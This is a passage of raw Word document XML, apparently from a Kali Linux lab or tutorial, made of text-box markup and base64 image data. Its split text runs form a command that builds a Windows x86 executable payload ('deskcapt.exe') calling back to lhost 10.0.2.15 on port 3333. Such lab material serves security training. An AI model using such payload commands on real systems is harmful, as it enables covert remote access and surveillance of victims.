                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>windows</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="842" name="Rectangle 842"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="687324" y="601980"/>
                            <a:ext cx="112728" cy="290255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>–</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="843" name="Rectangle 843"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="771144" y="601980"/>
                            <a:ext cx="565071" cy="290255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve">a x86 </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="844" name="Rectangle 844"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1194816" y="601980"/>
                            <a:ext cx="2579871" cy="290255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:proofErr w:type="spellStart"/>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>lhost</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>=</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve">10.0.2.15 </w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>lport</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve">=3333 </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="845" name="Rectangle 845"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3134899" y="601980"/>
                            <a:ext cx="67498" cy="290255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>-</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="846" name="Rectangle 846"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3185160" y="601980"/>
                            <a:ext cx="520479" cy="290255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>f</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> exe </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="847" name="Rectangle 847"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3576828" y="601980"/>
                            <a:ext cx="67498" cy="290255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>-</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="848" name="Rectangle 848"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3627120" y="601980"/>
                            <a:ext cx="179957" cy="290255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>o</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="11590" name="Shape 11590"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="796443"/>
                            <a:ext cx="2388108" cy="175260"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="2388108" h="175260">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2388108" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2388108"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850" name="Rectangle 850"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="777240"/>
                            <a:ext cx="1904866" cy="290255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>/home/kali/Desktop/</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="851" name="Rectangle 851"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1432560" y="777240"/>
                            <a:ext cx="878266" cy="290255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:proofErr w:type="spellStart"/>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>deskcapt</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:proofErr w:type="gramEnd"/>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="852" name="Rectangle 852"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2092452" y="777240"/>
                            <a:ext cx="394439" cy="290255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>.exe</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="853" name="Rectangle 853"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2388108" y="777240"/>
                            <a:ext cx="56314" cy="290255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="854" name="Rectangle 854"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4914900" y="4163568"/>
                            <a:ext cx="56314" cy="290255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:color w:val="FF0000"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="855" name="Rectangle 855"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="457200" y="4305300"/>
                            <a:ext cx="56314" cy="290255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:color w:val="FF0000"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="856" name="Rectangle 856"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4914900" y="7680960"/>
                            <a:ext cx="56314" cy="290255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:color w:val="FF0000"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="857" name="Rectangle 857"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="457200" y="7822692"/>
                            <a:ext cx="56314" cy="290255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:color w:val="FF0000"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="9488" name="Picture 9488"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId52"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="454025" y="969163"/>
                            <a:ext cx="4460875" cy="3346450"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="9489" name="Picture 9489"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId53"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="454025" y="4496588"/>
                            <a:ext cx="4460875" cy="3346450"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group id="Group 9468" o:spid="_x0000_s1192" style="width:403.55pt;height:633.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="51249,804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wQUAAYACAAAACEAhNqP3N0AAAAGAQAADwAA&#10;AGRycy9kb3ducmV2LnhtbEyPQUvDQBCF74L/YRnBm92kxVhiNqUU9VQEW0G8TZNpEpqdDdltkv57&#10;Ry/28mB4j/e+yVaTbdVAvW8cG4hnESjiwpUNVwY+968PS1A+IJfYOiYDF/Kwym9vMkxLN/IHDbtQ&#10;KSlhn6KBOoQu1doXNVn0M9cRi3d0vcUgZ1/pssdRym2r51GUaIsNy0KNHW1qKk67szXwNuK4XsQv&#10;w/Z03Fy+94/vX9uYjLm/m9bPoAJN4T8Mv/iCDrkwHdyZS69aA/JI+FPxltFTDOogoXmSLEDnmb7G&#10;z38AAAD//wMAUEsDBAoAAAAAAAAAIQBKoPgfqSgGAKkoBgAUAAAAZHJzL21lZGlhL2ltYWdlMS5w&#10;bmeJUE5HDQoaCgAAAA1JSERSAAAFfQAABB4IBgAAAIT4mYAAAAABc1JHQgCuzhzpAAAABGdBTUEA&#10;ALGPC/xhBQAA/7pJREFUeF7snQdgZFXVx8/MZNJ7z6bupm0v9N679CYdVERAxYoKqNgQFQuIggii&#10;oJ9SRFEQkCa9KLCwvZfsJpveezIz373/++7kZTKZTJKZZObl/OC392X6u+WVM2fuI4ZhGIZhGIZh&#10;GIZhGIZhGMY62OQ/1Qed6cFfjAVQTWm3oWkZi+D26CHKQzWUbP7v08YSIznyuHNQtjbXo2RGMxyf&#10;ZSwFwDtWTRzH/YxhooaXPmYsMNGAPtrlw15rYbPrBaNkLIHNzg1qGYymtPHG1xro9tTbXibK0Q2q&#10;Cm5WS+HBQS9ve62DDPaqgK+WYZiIQ25ztQzDMAzDTAmP2I9CuaxuYiwBHyQxTMShhyUPTQvh06DG&#10;zhS3cKavVVBBX4mNR68l4Azf8JIV02IsMRJHfD5KzvT1z7iZvubNrdvPWOVMX4aJHjjTN6rQm19O&#10;eLAGMuAr8Z7PcLtaBNWQnEVoIbxjlAdp1OKn6XiMRjv+xyNu5aBvtGM0n80jGlQ1NAd9oxsO9s4M&#10;bz/3B2OJkZx1/qdRctDXP2OCvsZmVo5S7xaXg74ME91w0DeKMB338mFvVKODvd5TGiPwwO0a3egj&#10;Iu845YCSdTDGJgd9oxg/TcdjNFrxbcyRra/3X39B37hYB8q01GQaHnZh2eVSpf67b2CIXLGpWKaE&#10;dFXGxKvSIZ4/AxsB2771xtJcRh8hcdDXKnDQd2bQQd/NmzejnMtUV1dz0HcCOOjLMHMADvpGERz0&#10;tQoc9LUm+oiIg74WxBibHPSNYvw0HY/RaMW3MUe2vt5//QV9i/OSUR592P7U1t6J5Y6uLlV29qDc&#10;truROvMPw7K9+niUlFmqyuR0IofeY6siHDh+c5axNBfRR0aqkH9z0Df6GZnDlwk3Ouh7xRVXoZzL&#10;PPzwHzjoOwHeoK+xeTWPUu8Wl4O+DBPdcNA3ChjZznLQN/pBwNdn18lBX2ugm5WDvhbEGJsc9I